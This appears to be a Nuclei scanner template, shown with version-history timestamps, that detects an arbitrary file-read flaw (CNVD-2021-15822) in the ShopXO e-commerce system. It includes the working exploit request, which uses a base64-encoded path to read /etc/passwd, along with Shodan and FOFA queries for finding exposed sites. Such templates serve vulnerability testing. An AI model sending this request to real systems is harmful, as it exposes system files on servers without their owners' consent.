2021-06-04 03:01:01 +00:00
id : CNVD-2021-15822
info :
name : ShopXO Download File Read
author : pikpikcu
severity : high
2023-05-30 09:06:46 +00:00
description : ShopXO is an open source enterprise-level open source e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information.
2022-04-22 10:38:41 +00:00
reference :
- https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
2022-05-12 14:18:36 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-05-12 14:18:36 +00:00
verified : true
shodan-query : title:"ShopXO企业级B2C电商系统提供商"
fofa-query : app="ShopXO企业级B2C电商系统提供商"
2022-01-04 06:26:46 +00:00
tags : shopxo,lfi,cnvd,cnvd2021
2021-06-04 03:01:01 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-04 03:01:01 +00:00
- raw :
- |
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-06-04 03:01:01 +00:00
- type : status
status :
- 200
2022-03-22 03:48:47 +00:00
# Enhanced by mp on 2022/03/17